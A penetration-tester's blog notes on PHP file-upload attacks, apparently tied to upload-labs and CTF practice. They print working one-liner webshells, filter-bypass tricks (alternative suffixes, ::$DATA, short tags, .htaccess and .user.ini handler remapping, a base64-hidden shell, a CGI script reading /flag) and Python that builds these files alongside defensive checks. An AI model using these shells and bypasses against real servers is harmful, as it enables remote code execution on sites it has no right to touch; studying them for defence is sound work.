title: file upload learning notes
date: 2021-5-22
tags: penetration test, file upload, basic
categories:
Penetration test
File upload
Basics
File upload learning notes
Notes from 2021/3/6
What is a one-liner webshell
A one-liner (一句话木马) is the "server side": a script file stored on the web server that contains a single statement.
It borrows the execution permission of the website's server process to run the malicious code we upload.
Once the statement is triggered, it receives the data the intruder sends through the client (the request parameter) and carries out the corresponding operation.
Advantage: short and powerful.
eval executes the string it is given as PHP code. `<?php @eval($_GET['a']); ?>` adds `@` so that warnings are suppressed and nothing is echoed to the page. Variants that take the code from different request sources:
```php
<?php eval($_GET['a']); ?>
<?php eval($_POST['a']); ?>
<?php eval($_REQUEST['a']); ?>
<?php eval($_COOKIE['a']); ?>
```
Variants of the one-liner
```php
<?php assert($_POST['a']); ?>
```
Caveat: assert() only evaluates a string argument on PHP 7.x (deprecated from 7.2); PHP 8.0 no longer accepts string assertions, so this variant is dead there.
Connection tools
- AntSword (中国蚁剑)
- China Chopper (中国菜刀)
Upload detection methods
- Client-side JavaScript check (usually only the suffix is checked)
- Server-side checks
  - Request Content-Type header check (e.g. image/gif, the MIME type)
  - File content header check (magic bytes such as GIF89a)
  - Suffix blacklist
  - Suffix whitelist
  - Custom regex check
- WAF device check (depends on the WAF product)
Bypasses
- Content-Type: intercept the request and change the header to image/jpeg
- File header: put a forged picture file header (GIF89a) in front of the payload
Client-side JavaScript check
Front-end JS checks can be bypassed directly:
- disable JS in the browser
- delete the `onsubmit="return checkFile()"` attribute from the form
- upload-labs Pass-01
Content-Type header check
- Upload an image that carries the shell, then change the file name to a PHP-parsable suffix in the intercepted request
- Or upload the PHP file, intercept with Burp Suite and change the Content-Type by hand
- upload-labs Pass-02
File content header check
- Forge the image file header by hand, e.g. prefix the payload with GIF89a
- Or insert the PHP code into a real picture
- upload-labs Pass-13
Blacklist
```php
<?php
// In practice the blacklist keeps growing and gets more complete
$blacklist = array('php', 'asp', 'aspx', 'jsp');
$path = "./uploads";
// Weak check: only the text after the last dot is compared against the list
$type = array_pop(explode('.', $_FILES['myfile']['name']));
if (in_array(strtolower($type), $blacklist)) {
    die("File type error!<br>");
} else {
    // The original file name is reused on disk
    $file = $path . '/' . $_FILES['myfile']['name'];
    if (move_uploaded_file($_FILES['myfile']['tmp_name'], $file)) {
        echo 'Success!<br>';
    } else {
        echo 'Error!<br>';
    }
}
?>
```
Against a blacklist, try alternative suffixes (case variants such as Php and pHp, plus pht, php5, phtml, shtml), trailing characters after the suffix (a space, a `.`, `::$DATA`, `. .` and so on), or upload an `.htaccess` file.
Defensive means
Random file name + suffix whitelist.
Alternative suffixes that may be parsed as script (whether they really are depends on the handler/type mapping in the server configuration):
- PHP: php2 php3 php5 phtml pht
- ASP: asa cer cdx
- ASPX: ascx ashx asac
- JSP: jsp jspx jspf
Bypass methods
- php3 php4 php5: the PHP 3/4/5 era file suffixes, still accepted for backward compatibility when the server maps them to the PHP handler. upload-labs Pass-03
- phtml: the standard file extension of PHP2 programs. upload-labs Pass-03
- ::$DATA (Windows NTFS alternate data stream): upload a file named xxx.php::$DATA; the check sees the suffix php::$DATA, but the file is written to disk as xxx.php.
- Case bypass: .Php .PHtml. upload-labs Pass-05
- https://www.freebuf.com/column/143101.html
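The following is an added example, not code from the original notes or from upload-labs: it re-implements the page's blacklist check in Python, feeds it the bypass file names listed above, and contrasts it with the "random file name + suffix whitelist" defense, which also insists that the magic bytes agree with the whitelisted suffix. The candidate file names and the GIF89a polyglot body are constructed test inputs.

```python
import os
import secrets

# Magic bytes an image-header check looks for (the page's GIF89a check is the first entry).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# Whitelist: allowed suffix -> the image kind the content must really be.
WHITELIST = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}
BLACKLIST = {"php", "asp", "aspx", "jsp"}


def blacklist_check(filename: str) -> bool:
    """Mirror of the page's PHP: array_pop(explode('.', $name)), lower-cased, against the list.
    Returns True when the upload would be accepted."""
    ext = filename.split(".")[-1].lower()
    return ext not in BLACKLIST


def content_type_check(content_type: str) -> bool:
    """Accepts on the client-supplied Content-Type header alone (trivially forged in Burp)."""
    return content_type.lower().startswith("image/")


def sniff(data: bytes):
    """Return the image kind the leading bytes claim, or None."""
    for kind, sigs in MAGIC.items():
        if data.startswith(sigs):
            return kind
    return None


def hardened_check(filename: str, data: bytes):
    """Whitelist + magic-byte agreement + random name. Returns the name to store under, or None."""
    # Strip what the filesystem would strip anyway: an NTFS ADS suffix (::$DATA) and trailing dots/spaces.
    name = filename.split("::", 1)[0].rstrip(". ")
    name = os.path.basename(name.replace("\\", "/"))
    # A leading dot is not a suffix: .htaccess / .user.ini have no extension at all.
    stem, dot, ext = name.lstrip(".").rpartition(".")
    if not dot or not stem:
        return None
    ext = ext.lower()
    if ext not in WHITELIST:
        return None
    if sniff(data) != WHITELIST[ext]:
        return None
    # The original name never reaches the disk; the stored suffix comes from the whitelist.
    return secrets.token_hex(16) + "." + ext


# Constructed bypass candidates taken from the tricks listed in the notes.
BYPASS_CANDIDATES = [
    "shell.phtml",       # alternative suffix not on the list
    "shell.php5",
    "shell.Php",         # rejected here because the check lower-cases; works only against case-sensitive lists
    "shell.php::$DATA",  # NTFS alternate data stream, written as shell.php on Windows
    "shell.php.",        # trailing dot, stripped by Windows
    ".htaccess",         # no blacklisted suffix, but changes how the directory is parsed
    "shell.php.gif",     # double extension; only dangerous if .gif is later mapped to the PHP handler
]


def blacklist_accepts(names=BYPASS_CANDIDATES):
    return [n for n in names if blacklist_check(n)]


def hardened_accepts(names=BYPASS_CANDIDATES, data=b"GIF89a<?php phpinfo(); ?>"):
    """Same candidates, each carrying a GIF89a polyglot body."""
    return [n for n in names if hardened_check(n, data)]


if __name__ == "__main__":
    print("blacklist lets through:", blacklist_accepts())
    print("hardened lets through:", hardened_accepts())
    print("legit upload stored as:", hardened_check("cat.gif", b"GIF89a" + b"\x00" * 16))
```

The hardened check still accepts `shell.php.gif` with a GIF89a prefix, because by the whitelist's rules it is a GIF; the defense is that it lands under a random `.gif` name in a directory that the server must not be allowed to remap (see the .htaccess and .user.ini sections below), not that the content is proven harmless.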
Content detection
Several tag syntaxes
`<? ?>` `<?php ... ?>` `<?= ... ?>` `<% ... %>` `<script language='php'> ... </script>`
Short tags
- The short open tag `<? ... ?>` only works when short_open_tag is enabled in php.ini.
- `<?=` is equivalent to `<? echo` and, from PHP 5.4.0 on, does not need short_open_tag.
- `<?=`whoami`?>` `<?=`ls`?>` (the backticks are PHP's shell execution operator, so the command output is echoed)
From the PHP manual changelog: 7.0.0, the ASP tags `<%`, `%>`, `<%=` and the script tag `<script language="php">` are removed from PHP; 5.4.0, the tag `<?=` is always available regardless of the short_open_tag ini setting.
The ASP tags `<% %>` additionally require asp_tags=On.
So on PHP < 7.0 the following can bypass a filter on `<?`:
```php
<script language='php'>phpinfo();</script>
```
- When `<?` is filtered, try `<script language='php'>`. Condition: PHP version < 7.0. BUU [Geek Challenge 2019] upload
- When `php` is filtered, try the short tags `<? ?>`. Condition: PHP version > 5.4 and short_open_tag=1 in php.ini. (challenge: "hand over your cat picture")
- When GET and POST are filtered, try eval($_REQUEST[a]).
- When eval is filtered, try assert($_GET[a]) (only works where assert() still evaluates strings: PHP < 8.0, deprecated from 7.2).
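As an added example (not part of the original notes), here is the defender's side of the tag-syntax list above: a scanner that recognises every PHP entry tag mentioned on the page, together with the common code/command sinks and the `$_GET`/`$_POST`/`$_REQUEST`/`$_COOKIE` sources, and a comparison against the naive "does it contain `<?php`" filter that each of those variants slips past. The sample upload bodies are constructed for the demonstration.

```python
import re

# PHP code-entry syntaxes from the notes, each tagged with the condition under which the server honours it.
TAG_PATTERNS = [
    ("<?php",        re.compile(rb"<\?php\b", re.I),                                   "always"),
    ("<?=",          re.compile(rb"<\?="),                                              "always since PHP 5.4.0"),
    ("<? (short)",   re.compile(rb"<\?(?!php|=|xml)", re.I),                            "short_open_tag=On"),
    ("<% (asp)",     re.compile(rb"<%"),                                                "asp_tags=On, PHP < 7.0"),
    ("<script php>", re.compile(rb"<script\s+language\s*=\s*['\"]?php['\"]?", re.I),    "PHP < 7.0"),
]
# Tags that are unambiguous on their own; the two-byte ones can occur inside real image data.
STRONG = {"<?php", "<?=", "<script php>"}

# Sinks that turn attacker data into code or commands (backticks are the shell execution operator).
SINK_RE = re.compile(rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(|`[^`]+`", re.I)
SOURCE_RE = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\b")


def naive_filter(data: bytes) -> bool:
    """The check the notes say gets bypassed: it rejects only a literal '<?php'."""
    return b"<?php" in data


def find_sinks(data: bytes):
    found = set()
    for m in SINK_RE.finditer(data):
        s = m.group(0)
        found.add("backtick" if s.startswith(b"`") else s.split(b"(")[0].strip().lower().decode())
    return sorted(found)


def scan(data: bytes) -> dict:
    """Report every PHP entry tag, sink and request source present in an upload body."""
    tags = [(name, cond) for name, rx, cond in TAG_PATTERNS if rx.search(data)]
    sources = sorted({"$_" + m.group(1).decode() for m in SOURCE_RE.finditer(data)})
    return {"tags": tags, "sinks": find_sinks(data), "sources": sources}


def is_php_payload(data: bytes) -> bool:
    """Reject on a strong tag alone, or on a weak tag that is paired with a sink or a request source."""
    r = scan(data)
    strong = any(name in STRONG for name, _ in r["tags"])
    weak = bool(r["tags"]) and bool(r["sinks"] or r["sources"])
    return strong or weak


# Constructed upload bodies, one per variant from the notes, plus a benign one.
SAMPLES = {
    "classic":    b"<?php eval($_REQUEST[a]); ?>",
    "script-tag": b"<script language='php'>phpinfo();</script>",
    "short-echo": b"GIF89a<?=`whoami`?>",
    "asp-tag":    b"<% assert($_GET[a]); %>",
    "short-open": b"<? system($_POST['cmd']); ?>",
    "plain-gif":  b"GIF89a\x00\x00<?xml version='1.0'?>",
}


def filter_gap():
    """Samples the naive filter lets through but scan() identifies as PHP."""
    return [k for k, v in SAMPLES.items() if not naive_filter(v) and is_php_payload(v)]


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:11} naive={naive_filter(body)!s:5} scan={is_php_payload(body)!s:5} {scan(body)}")
    print("missed by the naive filter:", filter_gap())
```

The version conditions attached to each tag are the same ones listed in the notes; a scanner should report them rather than silently ignore `<%` or `<script language='php'>` just because the current PHP is 7+, since the same upload directory may later be served by an older interpreter.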
.htaccess
```apache
# .htaccess
AddType application/x-httpd-php .jpg
```
After uploading that .htaccess, every .jpg in the directory is parsed as PHP, so you only need to upload a jpg that contains the shell:
```php
// shell.jpg (the PHP code goes between the tags; script tags need PHP < 7.0)
<script language='php'></script>
```
File content filtered
```apache
# .htaccess
AddType application/x-httpd-php .wuwu
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
```
shell.wuwu holds the base64 of the shell, e.g. produced in Python with:
```python
base64.b64encode(b"<?php eval($_GET['c']);?>")
```
php_value auto_append_file appends the named file to every PHP file that is executed; the php://filter wrapper base64-decodes shell.wuwu on the way in, so no `<?php` or `eval` ever appears in the uploaded bytes. Upload the encoded shell as shell.wuwu, upload the .htaccess, then visit shell.wuwu. Limitation: this can execute commands, but a shell client cannot connect through it.
Upload a CGI script
- .htaccess:
```apache
Options +ExecCGI
AddHandler cgi-script .xx
```
- Write the CGI script under Linux (LF line endings) and save it with the .xx suffix:
```bash
#!/bin/bash
echo "Content-type: text/plain"
echo ""
cat /flag
exit 0
```
- CGI reference: https://www.freebuf.com/vuls218495.html
- If the blacklist does not filter .htaccess, upload an .htaccess that makes .jpg files parse as PHP. upload-labs Pass-04
- When every character of the webshell is filtered, consider base64-encoding it and decoding it through the .htaccess auto_append_file trick above.
- If both .cgi files and .htaccess can be uploaded, consider uploading a CGI script. https://unctf.hackingfor.fun/#/train easy_upload
.user.ini
.user.ini works with nginx/apache/IIS: what matters is that PHP runs under CGI/FastCGI, not which web server is in front of it.
Condition: the server runs PHP in CGI/FastCGI mode, and the upload directory must already contain an executable PHP file (the prepended file is only loaded when some .php in that directory is executed).
.user.ini is effectively a php.ini that the user can "customize" per directory.
Definition of the PHP_INI_* modes:

| Mode | Meaning |
|---|---|
| PHP_INI_USER | Can be set in user scripts (e.g. ini_set()), in the Windows registry (since PHP 5.3) and in .user.ini |
| PHP_INI_PERDIR | Can be set in php.ini, .htaccess, httpd.conf or .user.ini (since PHP 5.3) |
| PHP_INI_SYSTEM | Can be set in php.ini or httpd.conf |
| PHP_INI_ALL | Can be set anywhere |

| Directive | Default | Changeable | Changelog |
|---|---|---|---|
| auto_append_file | NULL | PHP_INI_PERDIR | PHP_INI_ALL in PHP <= 4.2.3 |
| auto_detect_line_endings | "0" | PHP_INI_ALL | Available since PHP 4.3.0 |
| auto_globals_jit | "1" | PHP_INI_PERDIR | Available since PHP 5.0.0 |
| auto_prepend_file | NULL | PHP_INI_PERDIR | PHP_INI_ALL in PHP <= 4.2.3 |

auto_prepend_file string
Specifies a file that is automatically parsed before the main file, as if it were require()'d at the top. auto_append_file is similar, but the file is included at the end. Usage is simple; write it directly into .user.ini:
```ini
auto_prepend_file=cc.jpg
```
When .htaccess cannot be uploaded (the server is nginx) and the check is a blacklist, consider uploading .user.ini. Condition: server
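The following is an added example covering both the .htaccess section and the .user.ini section; it is not code from the original notes. The attacker-side helpers produce the per-directory config files and the base64-encoded shell body exactly as described above (the suffix `wuwu` and the file names `shell.wuwu` and `cc.jpg` are the page's own; the GIF polyglot is constructed here). The defender-side helpers show the two checks that close these tricks: refuse any dotfile / per-directory config file by name, and look for PHP tags through one layer of base64 so the `php://filter/convert.base64-decode` upload no longer hides the shell.

```python
import base64
import re

SHELL = b"<?php eval($_GET['c']); ?>"   # the one-liner used in the notes


# --- Apache: remap a harmless-looking suffix to the PHP handler ---------------------------
def htaccess_handler(ext: str) -> str:
    """.htaccess that makes Apache parse *.<ext> as PHP (the page's AddType trick)."""
    return f"AddType application/x-httpd-php .{ext}\n"


# --- Apache: content-filter bypass via auto_append_file + php://filter --------------------
def htaccess_base64_append(ext: str, payload: str) -> str:
    """.htaccess that base64-decodes `payload` and appends it to every PHP file in the directory."""
    return (f"AddType application/x-httpd-php .{ext}\n"
            f'php_value auto_append_file "php://filter/convert.base64-decode/resource={payload}"\n')


def encode_shell(shell: bytes = SHELL) -> bytes:
    """Body of shell.wuwu: base64 text, so no '<?', 'eval' or '$_' is left for a content filter."""
    return base64.b64encode(shell)


# --- nginx/FastCGI: the same idea with .user.ini -------------------------------------------
def user_ini_prepend(image_name: str) -> str:
    """.user.ini that prepends `image_name` to every .php executed in the directory."""
    return f"auto_prepend_file={image_name}\n"


def gif_polyglot(php: bytes = SHELL) -> bytes:
    """Constructed cc.jpg: passes a GIF89a header check but carries PHP code after the header."""
    return b"GIF89a" + php


# --- Defender side --------------------------------------------------------------------------
CONFIG_FILES = {".htaccess", ".user.ini"}
# Any PHP entry tag; '<?xml' is caught too, which is acceptable for a raster-image upload.
PHP_TAG = re.compile(rb"<\?(php|=)?|<script\s+language=['\"]?php", re.I)


def is_config_override(filename: str) -> bool:
    """Reject per-directory config files, and every other dotfile, by name."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return base in CONFIG_FILES or base.startswith(".")


def contains_php(data: bytes) -> bool:
    """Content check that also looks through one layer of base64."""
    if PHP_TAG.search(data):
        return True
    try:
        decoded = base64.b64decode(data, validate=True)
    except ValueError:          # binascii.Error is a ValueError: not base64, so nothing hidden
        return False
    return bool(PHP_TAG.search(decoded))


def attack_files():
    """Constructed upload set for the Apache base64 trick: (filename, body)."""
    return [
        (".htaccess", htaccess_base64_append("wuwu", "shell.wuwu").encode()),
        ("shell.wuwu", encode_shell()),
    ]


def blocked(files):
    """Which of the uploads a defender that checks names and decoded content rejects."""
    return [name for name, body in files if is_config_override(name) or contains_php(body)]


if __name__ == "__main__":
    for name, body in attack_files():
        print(f"--- {name}\n{body.decode()}")
    print("blocked:", blocked(attack_files()))
    print(".user.ini:", user_ini_prepend("cc.jpg").strip(), "| cc.jpg flagged:", contains_php(gif_polyglot()))
```

Note that `contains_php` is a filter on bytes, not a parser: the base64 pass defeats the exact trick from the notes, but the real fix is the one the defense section already gives (whitelisted suffix, random name, and no per-directory config or handler mapping honoured under the upload root).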